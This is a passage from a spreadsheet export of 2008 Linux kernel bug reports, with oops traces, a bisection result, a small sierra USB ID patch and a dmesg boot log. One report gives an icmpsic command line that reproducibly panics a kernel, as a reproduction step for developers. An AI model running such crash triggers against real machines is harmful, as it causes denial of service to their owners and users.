trace_hardirqs_on_thunk+0x35/0x3a [&lt;ffffffff8100cde8&gt;] child_rip+0xa/0x12 [&lt;ffffffff8100c4ff&gt;] restore_args+0x0/0x30 [&lt;ffffffff8104aba3&gt;] kthread+0x0/0x75 [&lt;ffffffff8100cdde&gt;] child_rip+0x0/0x12</t>
  </si>
  <si>
    <t>Driver 'sd' needs updating - please use bus_type methods</t>
  </si>
  <si>
    <t>2.6.30</t>
  </si>
  <si>
    <t>2008-02-01 13:41 UTC</t>
  </si>
  <si>
    <t>2012-05-17 15:31 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.23.1 Earliest failing kernel version: 2.6.24 Distribution: Slackware 10.2 Hardware Environment: IBM Thinkpad A30p Software Environment: booting up Problem Description: When booting up I get 'Driver 'sd' needs updating - please use bus_type methods' I downloaded the entire kernel (instead of patching my previous one) so the source for sd is new for sure. Everything seems to work. I would just like to know for sure that the error refers to a driver that uses the source in sd.c and what bus_type methods are. Steps to reproduce: Boot up</t>
  </si>
  <si>
    <t>BUG at net/ipv4/icmp.c:874</t>
  </si>
  <si>
    <t>2.6.24-06481-gaa62999</t>
  </si>
  <si>
    <t>2008-02-01 17:21 UTC</t>
  </si>
  <si>
    <t>2008-02-02 04:42 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: - Earliest failing kernel version: 2.6.24-06481-gaa62999 Distribution: Ubuntu Problem Description: using icmpsic on a box triggers the ooops Steps to reproduce: start icmpsic -s 192.168.0.201 -d 192.168.0.201 -p 35000 -r 22361 -k 33000 on the machine containing those interfaces will completely lock it up [ 360.552115] ------------[ cut here ]------------ [ 360.552235] kernel BUG at net/ipv4/icmp.c:874! [ 360.552235] invalid opcode: 0000 [#1] PREEMPT DEBUG_PAGEALLOC [ 360.552235] Modules linked in: [ 360.552235] [ 360.552235] Pid: 3899, comm: icmpsic Not tainted (2.6.24-06481-gaa62999 #20) [ 360.552235] EIP: 0060:[&lt;c05eb1b3&gt;] EFLAGS: 00010282 CPU: 0 [ 360.552235] EIP is at icmp_timestamp+0x83/0xd0 [ 360.552235] EAX: fffffff2 EBX: cae7d700 ECX: 00000000 EDX: fffffffc [ 360.552235] ESI: 003f04d0 EDI: caded000 EBP: c08efeb4 ESP: c08efe48 [ 360.552235] DS: 007b ES: 007b FS: 0000 GS: 0033 SS: 0068 [ 360.552235] Process icmpsic (pid: 3899, ti=c08ef000 task=cacf0000 task.ti=cacbf000) [ 360.552235] Stack: 00000004 00000001 cf449060 c0bfb720 cf0df4f0 cf0df4f0 cf081850 d8053f00 [ 360.552235] d8053f00 00000004 cae7d700 c08efed4 c0899628 c08efe90 c0603442 00000000 [ 360.552235] cf097090 c0603420 c08efeb4 c05b73dd 00000000 c05c5c10 00000001 47a3c2a2 [ 360.552235] Call Trace: [ 360.552235] [&lt;c0603442&gt;] ? ipt_hook+0x22/0x30 [ 360.552235] [&lt;c0603420&gt;] ? ipt_hook+0x0/0x30 [ 360.552235] [&lt;c05b73dd&gt;] ? nf_iterate+0x5d/0x90 [ 360.552235] [&lt;c05c5c10&gt;] ? ip_local_deliver_finish+0x0/0x170 [ 360.552235] [&lt;c05eadf6&gt;] ? icmp_rcv+0xe6/0x200 [ 360.552235] [&lt;c05c5c77&gt;] ? ip_local_deliver_finish+0x67/0x170 [ 360.552235] [&lt;c05c60ed&gt;] ? ip_local_deliver+0x2d/0xa0 [ 360.552235] [&lt;c05c5c10&gt;] ? ip_local_deliver_finish+0x0/0x170 [ 360.552235] [&lt;c05c59cf&gt;] ? ip_rcv_finish+0xdf/0x320 [ 360.552235] [&lt;c05b74ca&gt;] ? nf_hook_slow+0xba/0xe0 [ 360.552235] [&lt;c05c58f0&gt;] ? ip_rcv_finish+0x0/0x320 [ 360.552235] [&lt;c05c5feb&gt;] ? ip_rcv+0x16b/0x240 [ 360.552235] [&lt;c05c58f0&gt;] ? ip_rcv_finish+0x0/0x320 [ 360.552235] [&lt;c05c5e80&gt;] ? do_softirq+0x8a/0xd0 [ 360.552235] [&lt;c0128eb4&gt;] ? local_bh_enable+0xa4/0x110 [ 360.552235] [&lt;c05a43d0&gt;] ? dev_queue_xmit+0xa0/0x340 [ 360.552235] [&lt;c01547ad&gt;] ? __rcu_read_unlock+0x7d/0x90 [ 360.552235] [&lt;c05c9d4d&gt;] ? ip_finish_output+0x12d/0x2d0 [ 360.552235] [&lt;c05ca9a9&gt;] ? ip_output+0x79/0xd0 [ 360.552235] [&lt;c05e4b40&gt;] ? dst_output+0x0/0x10 [ 360.552235] [&lt;c05e4f71&gt;] ? raw_send_hdrinc+0x121/0x310 [ 360.552235] [&lt;c05e4b40&gt;] ? dst_output+0x0/0x10 [ 360.552235] [&lt;c05e60cd&gt;] ? raw_sendmsg+0x36d/0x3a0 [ 360.552235] [&lt;c05ee914&gt;] ? inet_sendmsg+0x34/0x60 [ 360.552235] [&lt;c0595c54&gt;] ? sock_sendmsg+0xc4/0xf0 [ 360.552235] [&lt;c01373b0&gt;] ? autoremove_wake_function+0x0/0x50 [ 360.552235] [&lt;c01050d3&gt;] ? restore_nocheck+0x12/0x15 [ 360.552235] [&lt;c0144bf4&gt;] ? trace_hardirqs_on+0xc4/0x150 [ 360.552235] [&lt;c01050d3&gt;] ? restore_nocheck+0x12/0x15 [ 360.552235] [&lt;c043ff06&gt;] ? copy_from_user+0x46/0x80 [ 360.552235] [&lt;c0595f45&gt;] ? __lock_release+0x46/0x70 [ 360.552235] [&lt;c01070e5&gt;] ? do_softirq+0x55/0xd0 [ 360.552235] [&lt;c0596e37&gt;] ? sys_socketcall+0x187/0x260 [ 360.552235] [&lt;c0104fea&gt;] ? sysenter_past_esp+0x5f/0xa5 [ 360.552235] ======================= [ 360.552235] Code: f7 ea 69 f6 e8 03 00 00 c1 f9 1f c1 fa 06 29 ca 8d 04 16 31 d2 0f c8 8d 4d ac 89 45 b0 89 45 b4 89 d8 e8 c1 02 89 5d 98 c7 45 9c 00 00 00 [ 360.552235] EIP: [&lt;c05eb1b3&gt;] icmp_timestamp+0x83/0xd0 SS:ESP 0068:c08efe48 [ 360.552276] Kernel panic - not syncing: Fatal exception in interrupt Using the icmpsic command from another box doesnt do a thing, using 127.0.0.1 will also work.</t>
  </si>
  <si>
    <t>Undocking Lenovo ThinkPad T61 causes oops</t>
  </si>
  <si>
    <t>2.6.24-git4</t>
  </si>
  <si>
    <t>2008-02-02 02:07 UTC</t>
  </si>
  <si>
    <t>2008-03-05 14:55 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24-rc8 Earliest failing kernel version: n/a Distribution: ubuntu/unstable Hardware Environment: Lenovo ThinkPad T61 + dock station Software Environment: any Problem Description: Undocking Lenovo ThinkPad T61 causes oops Steps to reproduce: Just push undock button. [79721.755165] BUG: unable to handle kernel paging request at 000000340000000e [79721.755165] IP: [&lt;ffffffff8034d147&gt;] acpi_ns_map_handle_to_node+0x14/0x1d [79721.755165] PGD 7203a067 PUD 0 [79721.755165] Oops: 0000 [1] SMP [79721.755165] CPU 1 [79721.755165] Modules linked in: usb_storage i915 drm rfcomm l2cap bluetooth fuse arc4 ecb crypto_blkcipher ehci_hcd uhci_hcd e1000e snd_hda_intel intel_agp thinkpad_acpi [last unloaded: cfg80211] [79721.755165] Pid: 69, comm: kacpi_notify Not tainted 2.6.24-git9 #4 [79721.755165] RIP: 0010:[&lt;ffffffff8034d147&gt;] [&lt;ffffffff8034d147&gt;] acpi_ns_map_handle_to_node+0x14/0x1d [79721.755165] RSP: 0018:ffff81007d197d28 EFLAGS: 00010246 [79721.755165] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000 [79721.755165] RDX: 0000000000017567 RSI: 000000100002c0d0 RDI: 0000003400000006 [79721.755165] RBP: 0000000000000000 R08: ffff810003c00000 R09: 0000000000000000 [79721.755165] R10: 0000000000000002 R11: 0000000000000001 R12: 0000003400000006 [79721.755165] R13: 0000000000000000 R14: ffff81007d197d68 R15: ffff81007d197d70 [79721.755165] FS: 0000000000000000(0000) GS:ffff81007d00e380(0000) knlGS:0000000000000000 [79721.755165] CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b [79721.755165] CR2: 000000340000000e CR3: 000000007200a000 CR4: 00000000000006a0 [79721.755165] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [79721.755165] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [79721.755165] Process kacpi_notify (pid: 69, threadinfo ffff81007d196000, task ffff81007d18ef20) [79721.755165] Stack: ffffffff8034e19f ffff8100519e8800 ffff81007d197de0 0000000000000001 [79721.755165] 0000000000000000 0000000000000001 ffffffff80357d3d ffff81007d02cdc0 [79721.755165] 0000000000000000 0000003400000006 0000000000000000 ffffffff8058cbaa [79721.755165] Call Trace: [79721.755165] [&lt;ffffffff8034e19f&gt;] acpi_get_next_object+0x3b/0x99 [79721.755165] [&lt;ffffffff80357d3d&gt;] acpi_bus_trim+0x57/0x109 [79721.755165] [&lt;ffffffff8035b28b&gt;] hotplug_dock_devices+0x97/0x117 [79721.755166] [&lt;ffffffff8035b3a9&gt;] handle_eject_request+0x4e/0xd3 [79721.755166] [&lt;ffffffff8033e04a&gt;] acpi_os_execute_notify+0x0/0x2c [79721.755166] [&lt;ffffffff80356088&gt;] acpi_bus_get_device+0x1d/0x2e [79721.755166] [&lt;ffffffff803560b0&gt;] acpi_bus_notify+0x17/0x4c [79721.755166] [&lt;ffffffff8033e04a&gt;] acpi_os_execute_notify+0x0/0x2c [79721.755166] [&lt;ffffffff80343a1d&gt;] acpi_ev_notify_dispatch+0x57/0x60 [79721.755166] [&lt;ffffffff8033e06d&gt;] acpi_os_execute_notify+0x23/0x2c [79721.755166] [&lt;ffffffff802460bf&gt;] run_workqueue+0xbf/0x160 [79721.755166] [&lt;ffffffff80246b00&gt;] worker_thread+0x0/0x100 [79721.755166] [&lt;ffffffff80246b00&gt;] worker_thread+0x0/0x100 [79721.755166] [&lt;ffffffff80246b9f&gt;] worker_thread+0x9f/0x100 [79721.755166] [&lt;ffffffff80249e50&gt;] autoremove_wake_function+0x0/0x30 [79721.755166] [&lt;ffffffff80246b00&gt;] worker_thread+0x0/0x100 [79721.755166] [&lt;ffffffff80246b00&gt;] worker_thread+0x0/0x100 [79721.755166] [&lt;ffffffff80249a4b&gt;] kthread+0x4b/0x80 [79721.755166] [&lt;ffffffff8020d128&gt;] child_rip+0xa/0x12 [79721.755166] [&lt;ffffffff80249a00&gt;] kthread+0x0/0x80 [79721.755166] [&lt;ffffffff8020d11e&gt;] child_rip+0x0/0x12 [79721.755166] [79721.755166] [79721.755166] Code: 00 c3 49 ff c1 48 83 c6 04 41 ff c8 45 85 c0 75 a8 31 c0 c6 06 00 c3 48 8d 47 ff 48 83 f8 fd 76 08 48 8b 05 dc 49 39 00 c3 31 c0 &lt;80&gt; 7f 08 0f 48 0f 44 c7 c3 48 89 f8 c3 31 c0 48 85 ff 74 0d f6 [79721.755166] RIP [&lt;ffffffff8034d147&gt;] acpi_ns_map_handle_to_node+0x14/0x1d [79721.755166] RSP &lt;ffff81007d197d28&gt; [79721.755166] CR2: 000000340000000e [79721.755166] ---[ end trace 05a1f30122eb8809 ]---</t>
  </si>
  <si>
    <t>commit 57a6a46aa26d6e39c62daf8b3b96e94f76e6846f makes system unbootable</t>
  </si>
  <si>
    <t>2.6.25-git8</t>
  </si>
  <si>
    <t>2008-02-03 07:06 UTC</t>
  </si>
  <si>
    <t>2008-02-05 04:48 UTC</t>
  </si>
  <si>
    <t>Bisecting bootable kernel seems to give: 57a6a46aa26d6e39c62daf8b3b96e94f76e6846f is first bad commit commit 57a6a46aa26d6e39c62daf8b3b96e94f76e6846f Author: Thomas Gleixner &lt;tglx@linutronix.de&gt; Date: Wed Jan 30 13:34:08 2008 +0100 x86: cpa: implement clflush optimization Use clflush on CPUs which support this. clflush is only used when the page attribute operation has been successful. On CPUs which do not support clflush and in the case of error the old fashioned global_flush_tlb() is called. Signed-off-by: Thomas Gleixner &lt;tglx@linutronix.de&gt; Signed-off-by: Ingo Molnar &lt;mingo@elte.hu&gt; :040000 040000 ab86e17944eace7f7a88383900c1fec465b02385 37f83fc8fd9ebfa68044d669e24c6fbbf0c6a039 M arch Distribution: Gentoo Hardware Environment: macbook revision 2 (core 2 t7200, on bios compatibility module) Problem Description: on boot I get something related to interrupts as a last message for example hda lost interrupt ide-cd cmd 0x5a timed out please prompt for further information</t>
  </si>
  <si>
    <t>using the attached config hangs the kernel at boot</t>
  </si>
  <si>
    <t>linux-2.6.24-git13</t>
  </si>
  <si>
    <t>2008-02-04 03:33 UTC</t>
  </si>
  <si>
    <t>2008-02-17 04:24 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: linux-2.6.24-git9 Earliest failing kernel version: linux-2.6.24-git13 Distribution: Bluewhite64 12 Hardware Environment: Sempron 3200+, nForce 450 chipset, 512MB RAM Software Environment: Problem Description: kernel hangs at boot Steps to reproduce: use linux-2.6.24-git13 with attached config; (not sure if it is related, but with git9 the nforce NIC appeared to use PCIe/MSI)</t>
  </si>
  <si>
    <t>saa7134-alsa not working for FlyDVB-S LR300</t>
  </si>
  <si>
    <t>2008-02-04 11:06 UTC</t>
  </si>
  <si>
    <t>2008-07-17 07:27 UTC</t>
  </si>
  <si>
    <t>Hi. I've been trying to use saa7134-alsa with my FlyDVB-S LR300 since 2.6.22 but I've never been able to get it to work. I tried 2.6.24 for the first time today but it still fails in the same way. The module loads fine with no unusual messages, even with debugging on. I set the volume on all channels to maximum using alsamixer and then try the following. chewi@rhapsody % arecord -D hw:2,0 -r 32000 -c 2 -f S16_LE | aplay Recording WAVE 'stdin' : Signed 16 bit Little Endian, Rate 32000 Hz, Stereo Playing WAVE 'stdin' : Signed 16 bit Little Endian, Rate 32000 Hz, Stereo underrun!!! (at least 540.484 ms long) underrun!!! (at least 540.547 ms long) underrun!!! (at least 540.496 ms long) underrun!!! (at least 540.549 ms long) All I hear is a series of clicks. It sounds kind of like the card's audio is repeatedly initialising. This is all I get in the kernel log, including loading and unloading the module. saa7134 ALSA driver for DMA sound loaded saa7134[0]/alsa: saa7134[0] at 0xfe6ffc00 irq 18 registered as card 2 saa7134[0]/alsa: rec_start: afmt=2 ch=2 =&gt; fmt=0x9d swap=- saa7134 ALSA driver for DMA sound unloaded I have also tried to use the card with mplayer but I just get the same clicks. What's interesting is that the video pauses every time there is a click and then accelerates to catch up. Other points worth mentioning... I'm on Gentoo. The DVB part of the card works perfectly. I do remember to stop MythTV before trying this stuff. The video capture quality isn't great and mencoder (not mplayer) segfaults if I capture from the card with v4l2. Capturing with v4l1 works. All that is probably unrelated though. Let me know what other information I can provide.</t>
  </si>
  <si>
    <t>budget frontend driver tda10086 broken for TT-1401S</t>
  </si>
  <si>
    <t>2008-02-04 11:49 UTC</t>
  </si>
  <si>
    <t>Dirk Brenken</t>
  </si>
  <si>
    <t>2008-02-12 13:31 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24-rc5 Earliest failing kernel version: 2.6.24-rc6 Distribution: debian unstable Hardware Environment: I386 Software Environment: vdr-1.5.13, xineliboutput (latest cvs checkout) Problem Description:&gt; I'm running a "budget-only" (Technotrend S-1401) vdr system (1.5.13) with xineliboutput plugin (latest cvs checkout). It's based on debian sid and it runs fine with kernel 2.6.23.14 ... up to kernel 2.6.24-rc5. After that version, my budget card system stopped working. The problem also occurs with kernel 2.6.23.14 plus latest v4l-dvb checkout. After discussion with Oliver Endriss on v4l-dvb mailing list, I could solve this problem by revoking the patch http://linuxtv.org/hg/v4l-dvb/rev/816f256c2973 Please revoke the above patch, thanks! Steps to reproduce:</t>
  </si>
  <si>
    <t>[PATCH] Add Support for AT&amp;T 881U</t>
  </si>
  <si>
    <t>2008-02-05 15:09 UTC</t>
  </si>
  <si>
    <t>David Roth</t>
  </si>
  <si>
    <t>2008-05-17 15:20 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24 Distribution: Ubuntu Hardware Environment: Sierra Wireless Adapter (AT&amp;T 881U) Problem Description: No support on Kernel 2.6.24 and earlier.Please, consider this trivial patch and commit it to upstream. I have been using it for sometime now with out any issues (Used it to post this bug!). Thanks!!! P.S. This is my first patch, if this procedure is incorrect, I apologize in advance! Go Linux!! --- sierra.c 2008-01-28 05:52:14.000000000 -0600 +++ ../Working/sierra/sierra.c 2008-01-26 20:34:48.000000000 -0600 @@ -117,6 +117,7 @@ { USB_DEVICE(0x1199, 0x6851) }, /* Sierra Wireless AirCard 881 */ { USB_DEVICE(0x1199, 0x6852) }, /* Sierra Wireless AirCard 880 E */ { USB_DEVICE(0x1199, 0x6853) }, /* Sierra Wireless AirCard 881 E */ + { USB_DEVICE(0x1199, 0x6856) }, /* Sierra Wireless AirCard 881 U */ { USB_DEVICE(0x1199, 0x0112), .driver_info = DEVICE_1_PORT }, /* Sierra Wireless AirCard 580 */ { USB_DEVICE(0x0F3D, 0x0112), .driver_info = DEVICE_1_PORT }, /* Airprime/Sierra PC 5220 */ @@ -155,6 +156,7 @@ { USB_DEVICE(0x1199, 0x6851) }, /* Sierra Wireless AirCard 881 */ { USB_DEVICE(0x1199, 0x6852) }, /* Sierra Wireless AirCard 880E */ { USB_DEVICE(0x1199, 0x6853) }, /* Sierra Wireless AirCard 881E */ + { USB_DEVICE(0x1199, 0x6856) }, /* Sierra Wireless AirCard 881U */ { } };</t>
  </si>
  <si>
    <t>ASUS DVD-E616A - drive side 80-wire cable detection failed</t>
  </si>
  <si>
    <t>2008-02-06 12:40 UTC</t>
  </si>
  <si>
    <t>Joseph Terner</t>
  </si>
  <si>
    <t>2008-06-18 03:32 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: 2.6.21 Distribution: Gentoo (with vanilla kernel on x86_64) or Slackware (on i386). Hardware Environment: Mainboard: 939Dual-VSTA, BIOS P1.30 DVD-ROM drive: ASUS DVD-E616A (UDMA100 capable). # dmesg Linux version 2.6.24 (root@plex) (gcc version 4.1.2 (Gentoo 4.1.2 p1.0.2)) #5 SMP Tue Jan 29 19:07:57 CET 2008 Command line: root=/dev/hda5 ro notsc BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009fc00 (usable) BIOS-e820: 000000000009fc00 - 00000000000a0000 (reserved) BIOS-e820: 00000000000e8000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 000000007ffb0000 (usable) BIOS-e820: 000000007ffb0000 - 000000007ffc0000 (ACPI data) BIOS-e820: 000000007ffc0000 - 000000007fff0000 (ACPI NVS) BIOS-e820: 000000007fff0000 - 0000000080000000 (reserved) BIOS-e820: 00000000ff380000 - 0000000100000000 (reserved) Entering add_active_range(0, 0, 159) 0 entries of 256 used Entering add_active_range(0, 256, 524208) 1 entries of 256 used end_pfn_map = 1048576 DMI present. ACPI: RSDP 000FA900, 0014 (r0 ACPIAM) ACPI: RSDT 7FFB0000, 0038 (r1 A M I OEMRSDT 9000625 MSFT 97) ACPI: FACP 7FFB0200, 0084 (r2 A M I OEMFACP 9000625 MSFT 97) ACPI: DSDT 7FFB0440, 496C (r1 939DV 939DV122 122 INTL 20051117) ACPI: FACS 7FFC0000, 0040 ACPI: APIC 7FFB0390, 0068 (r1 A M I OEMAPIC 9000625 MSFT 97) ACPI: MCFG 7FFB0400, 003C (r1 A M I OEMMCFG 9000625 MSFT 97) ACPI: OEMB 7FFC0040, 005C (r1 A M I AMI_OEM 9000625 MSFT 97) ACPI: HPET 7FFB4DB0, 0038 (r1 A M I OEMHPET 9000625 MSFT 97) Entering add_active_range(0, 0, 159) 0 entries of 256 used Entering add_active_range(0, 256, 524208) 1 entries of 256 used Zone PFN ranges: DMA 0 -&gt; 4096 DMA32 4096 -&gt; 1048576 Normal 1048576 -&gt; 1048576 Movable zone start PFN for each node early_node_map[2] active PFN ranges 0: 0 -&gt; 159 0: 256 -&gt; 524208 On node 0 totalpages: 524111 DMA zone: 56 pages used for memmap DMA zone: 1761 pages reserved DMA zone: 2182 pages, LIFO batch:0 DMA32 zone: 7110 pages used for memmap DMA32 zone: 513002 pages, LIFO batch:31 Normal zone: 0 pages used for memmap Movable zone: 0 pages used for memmap ACPI: PM-Timer IO Port: 0x808 ACPI: Local APIC address 0xfee00000 ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] enabled) Processor #0 (Bootup-CPU) ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled) Processor #1 ACPI: IOAPIC (id[0x02] address[0xfec00000] gsi_base[0]) IOAPIC[0]: apic_id 2, address 0xfec00000, GSI 0-23 ACPI: IOAPIC (id[0x03] address[0xfec10000] gsi_base[24]) IOAPIC[1]: apic_id 3, address 0xfec10000, GSI 24-39 ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 low level) ACPI: IRQ0 used by override. ACPI: IRQ2 used by override. ACPI: IRQ9 used by override. Setting APIC routing to flat ACPI: HPET id: 0x10b9a201 base: 0xfed00000 Using ACPI (MADT) for SMP configuration information swsusp: Registered nosave memory region: 000000000009f000 - 00000000000a0000 swsusp: Registered nosave memory region: 00000000000a0000 - 00000000000e8000 swsusp: Registered nosave memory region: 00000000000e8000 - 0000000000100000 Allocating PCI resources starting at 88000000 (gap: 80000000:7f380000) SMP: Allowing 2 CPUs, 0 hotplug CPUs PERCPU: Allocating 29664 bytes of per cpu data Built 1 zonelists in Zone order, mobility grouping on. Total pages: 515184 Kernel command line: root=/dev/hda5 ro notsc Initializing CPU#0 PID hash table entries: 4096 (order: 12, 32768 bytes) hpet clockevent registered TSC calibrated against HPET Marking TSC unstable due to TSCs unsynchronized time.c: Detected 2200.078 MHz processor. Console: colour VGA+ 80x25 console [tty0] enabled Dentry cache hash table entries: 262144 (order: 9, 2097152 bytes) Inode-cache hash table entries: 131072 (order: 8, 1048576 bytes) Checking aperture... CPU 0: aperture @ c0000000 size 256 MB Memory: 2056944k/2096832k available (4067k kernel code, 39208k reserved, 1888k data, 268k init) Calibrating delay using timer specific routine.. 4402.66 BogoMIPS (lpj=8805336) Mount-cache hash table entries: 256 CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) CPU: L2 Cache: 512K (64 bytes/line) CPU: Physical Processor ID: 0 CPU: Processor Core ID: 0 SMP alternatives: switching to UP code ACPI: Core revision 20070126 Using local APIC timer interrupts. APIC timer calibration result 12500443 Detected 12.500 MHz APIC timer. SMP alternatives: switching to SMP code Booting processor 1/2 APIC 0x1 Initializing CPU#1 Calibrating delay using timer specific routine.. 4400.15 BogoMIPS (lpj=8800304) CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) CPU: L2 Cache: 512K (64 bytes/line) CPU: Physical Processor ID: 0 CPU: Processor Core ID: 1 AMD Athlon(tm) 64 X2 Dual Core Processor 4200+ stepping 02 Brought up 2 CPUs net_namespace: 120 bytes NET: Registered protocol family 16 ACPI: bus type pci registered PCI: BIOS Bug: MCFG area at e0000000 is not E820-reserved PCI: Not using MMCONFIG. PCI: Using configuration type 1 ACPI: EC: Look up EC in DSDT ACPI: Interpreter enabled ACPI: (supports S0 S1 S3 S4 S5) ACPI: Using IOAPIC for interrupt routing ACPI: PCI Root Bridge [PCI0] (0000:00) PCI quirk: region 0800-083f claimed by ali7101 ACPI PCI: Transparent bridge - 0000:00:06.0 ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P4._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.HTT_._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PEB1._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PEB2._PRT] ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 *5 6 7 10 11 12 14 15) ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 6 7 *10 11 12 14 15) ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 6 7 *10 11 12 14 15), disabled. ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 6 7 *10 11 12 14 15), disabled. ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 6 7 10 *11 12 14 15) ACPI: PCI Interrupt Link [LNKF] (IRQs *3 4 5 6 7 10 11 12 14 15) ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 5 6 7 10 *11 12 14 15) ACPI: PCI Interrupt Link [LNKH] (IRQs 3 4 5 6 7 10 11 12 14 15) *9 ACPI: PCI Interrupt Link [LNKP] (IRQs 3 4 *5 6 7 10 11 12 14 15) ACPI Warning (tbutils-0217): Incorrect checksum in table [OEMB] - 67, should be 5A [20070126] Linux Plug and Play Support v0.97 (c) Adam Belay pnp: PnP ACPI init ACPI: bus type pnp registered pnp: PnP ACPI: found 16 devices ACPI: ACPI bus type pnp unregistered SCSI subsystem initialized libata version 3.00 loaded. usbcore: registered new interface driver usbfs usbcore: registered new interface driver hub usbcore: registered new device driver usb PCI: Using ACPI for IRQ routing PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report PCI: Cannot allocate resource region 0 of device 0000:00:04.0 agpgart: Detected AGP bridge 20 Setting up ULi AGP. agpgart: AGP aperture is 256M @ 0xc0000000 hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0 hpet0: 3 64-bit timers, 14318180 Hz ACPI: RTC can wake from S4 Time: hpet clocksource has been installed. Switched to high resolution mode on CPU 0 Switched to high resolution mode on CPU 1 system 00:07: ioport range 0x480-0x48f has been reserved system 00:07: ioport range 0x4d0-0x4d1 has been reserved system 00:07: ioport range 0x800-0x87f could not be reserved system 00:07: ioport range 0x400-0x40f has been reserved system 00:09: iomem range 0xfec00000-0xfec00fff has been reserved system 00:09: iomem range 0xfee00000-0xfee00fff could not be reserved system 00:09: iomem range 0xfec10000-0xfec10fff has been reserved system 00:09: iomem range 0xff380000-0xffffffff could not be reserved system 00:0d: ioport range 0x290-0x29f has been reserved system 00:0e: iomem range 0xe0000000-0xefffffff has been reserved system 00:0f: iomem range 0x0-0x9ffff could not be reserved system 00:0f: iomem range 0xc0000-0xcffff has been reserved system 00:0f: iomem range 0xe0000-0xfffff could not be reserved system 00:0f: iomem range 0x100000-0x7fffffff could not be reserved system 00:0f: iomem range 0x0-0x0 could not be reserved PCI: Bridge: 0000:00:01.0 IO window: disabled. MEM window: disabled. PREFETCH window: d7e00000-d7efffff PCI: Bridge: 0000:00:02.0 IO window: disabled. MEM window: disabled. PREFETCH window: d7f00000-d7ffffff PCI: Bridge: 0000:00:05.0 IO window: disabled. MEM window: f5000000-f7efffff PREFETCH window: d8000000-dfffffff PCI: Bridge: 0000:00:06.0 IO window: e000-efff MEM window: f7f00000-f7ffffff PREFETCH window: disabled. ACPI: PCI Interrupt 0000:00:01.0[A] -&gt; GSI 29 (level, low) -&gt; IRQ 29 PCI: Setting latency timer of device 0000:00:01.0 to 64 ACPI: PCI Interrupt 0000:00:02.0[A] -&gt; GSI 34 (level, low) -&gt; IRQ 34 PCI: Setting latency timer of device 0000:00:02.0 to 64 PCI: Setting latency timer of device 0000:00:05.0 to 64 PCI: Setting latency timer of device 0000:00:06.0 to 64 NET: Registered protocol family 2 IP route cache hash table entries: 65536 (order: 7, 524288 bytes) TCP established hash table entries: 262144 (order: 10, 4194304 bytes) TCP bind hash table entries: 65536 (order: 8, 1048576 bytes) TCP: Hash tables configured (established 262144 bind 65536) TCP reno registered Total HugeTLB memory allocated, 0 Installing knfsd (copyright (C) 1996 okir@monad.swb.de). NTFS driver 2.1.29 [Flags: R/O]. fuse init (API version 7.9) io scheduler noop registered io scheduler deadline registered io scheduler cfq registered (default) Boot video device is 0000:03:00.0 PCI: Setting latency timer of device 0000:00:01.0 to 64 assign_interrupt_mode Found MSI capability Allocate Port Service[0000:00:01.0:pcie00] PCI: Setting latency timer of device 0000:00:02.0 to 64 assign_interrupt_mode Found MSI capability Allocate Port Service[0000:00:02.0:pcie00] input: Power Button (FF) as /class/input/input0 ACPI: Power Button (FF) [PWRF] input: Power Button (CM) as /class/input/input1 ACPI: Power Button (CM) [PWRB] lp: driver loaded but no devices found hpet_resources: 0xfed00000 is busy Generic RTC Driver v1.07 Non-volatile memory driver v1.2 ppdev: user-space parallel port driver Linux agpgart interface v0.102 Serial: 8250/16550 driver $Revision: 1.90 $ 4 ports, IRQ sharing disabled serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A 00:0c: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A parport_pc 00:06: reported by Plug and Play ACPI parport0: PC-style at 0x378 (0x778), irq 7, dma 3 [PCSPP,TRISTATE,COMPAT,ECP,DMA] lp0: using parport0 (interrupt-driven). Floppy drive(s): fd0 is 1.44M FDC 0 is a post-1991 82077 RAMDISK driver initialized: 16 RAM disks of 4096K size 1024 blocksize loop: module loaded tun: Universal TUN/TAP device driver, 1.6 tun: (C) 1999-2004 Max Krasnyansky &lt;maxk@qualcomm.com&gt; r8169 Gigabit Ethernet driver 2.2LK loaded ACPI: PCI Interrupt 0000:04:06.0[A] -&gt; GSI 21 (level, low) -&gt; IRQ 21 eth0: RTL8110s at 0xffffc2000001ec00, 00:08:54:50:83:ee, XID 04000000 IRQ 21 uli526x: ULi M5261/M5263 net driver, version 0.9.3 (2005-7-29) ACPI: PCI Interrupt 0000:00:11.0[A] -&gt; GSI 17 (level, low) -&gt; IRQ 17 eth1: ULi M5263 at pci0000:00:11.0, 00:13:8f:c5:2b:56, irq 17. Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with 